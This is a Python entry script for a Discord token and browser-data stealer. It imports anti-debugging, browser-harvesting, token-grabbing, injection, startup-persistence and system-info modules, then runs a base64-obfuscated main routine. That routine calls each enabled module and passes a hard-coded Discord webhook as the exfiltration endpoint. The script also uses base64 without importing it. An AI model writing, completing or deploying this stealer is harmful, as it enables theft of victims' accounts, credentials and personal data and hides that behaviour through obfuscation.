from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__


exec(base64.b64decode("ZGVmIG1haW4oKToNCiAgICBmdW5jcyA9IFsNCiAgICAgICAgQW50aURlYnVnLA0KICAgICAgICBCcm93c2VycywNCiAgICAgICAgRGlzY29yZFRva2VuLA0KICAgICAgICBJbmplY3Rpb24sDQogICAgICAgIFN0YXJ0dXAsDQogICAgICAgIFN5c3RlbUluZm8sDQogICAgXQ0KDQogICAgZm9yIGZ1bmMgaW4gZnVuY3M6DQogICAgICAgIGlmIF9fQ09ORklHX19bZnVuYy5fX25hbWVfXy5sb3dlcigpXToNCiAgICAgICAgICAgIGlmIGZ1bmMuX19pbml0X18uX19jb2RlX18uY29fYXJnY291bnQgPT0gMjoNCiAgICAgICAgICAgICAgICBmdW5jKF9fQ09ORklHX19bJ2h0dHBzOi8vZGlzY29yZC5jb20vYXBpL3dlYmhvb2tzLzEwNDUzNzkwNTY0NzgyMDQwMzUvdmRwenhNUl8xd3h5ZkpUX2tXNWhoSHY5NVhIWmRIRUx0Y3ZEN0pFTzJ4WG5oZlJmbmNFakt1LUFyVVh2WlRKS2g0azYnXSkNCiAgICAgICAgICAgIGVsc2U6DQogICAgICAgICAgICAgICAgZnVuYygpDQoNCmlmIF9fbmFtZV9fID09ICdfX21haW5fXyc6DQogICAgbWFpbigp"))
